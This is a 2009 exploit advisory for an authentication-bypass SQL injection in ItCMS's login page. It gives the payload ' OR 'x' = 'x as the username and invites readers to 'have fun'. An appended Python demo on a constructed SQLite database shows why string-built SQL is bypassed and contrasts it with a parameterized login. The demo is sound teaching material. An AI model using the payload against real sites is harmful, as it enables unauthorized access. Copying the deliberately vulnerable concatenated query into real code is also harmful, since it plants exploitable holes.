
# Title : ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-06
# Author : certaindeath


--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^
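
Why the username above gets past a login check, and how binding the input as a parameter stops it. This is an added example, not part of the original advisory and not ItCMS code: the table layout, the query text and the function names are assumptions, and the demo uses an in-memory SQLite database with constructed data.

```python
import hashlib
import hmac
import sqlite3

PAGE_USERNAME = "' OR 'x' = 'x"   # username value quoted in the advisory

def pw_hash(password):
    # Simplified for the demo; real code should use a salted, slow KDF.
    return hashlib.sha256(password.encode()).hexdigest()

def make_db():
    # Constructed sample data; hypothetical schema, not taken from ItCMS.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", pw_hash("constructed-admin-password")))
    return db

def login_vulnerable(db, username, password):
    # Input is concatenated into the SQL text. With PAGE_USERNAME the clause
    # becomes:  pw_hash = '...' AND username = '' OR 'x' = 'x'
    # AND binds tighter than OR, so the trailing 'x' = 'x' makes every row match.
    sql = ("SELECT username FROM users WHERE pw_hash = '" + pw_hash(password)
           + "' AND username = '" + username + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password):
    # The username is bound as a parameter, so quotes in it stay data.
    row = db.execute("SELECT pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    # Compare the stored hash in application code, in constant time.
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        print(name, "page input ->", fn(db, PAGE_USERNAME, "anything"))
        print(name, "real login ->", fn(db, "admin", "constructed-admin-password"))
```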
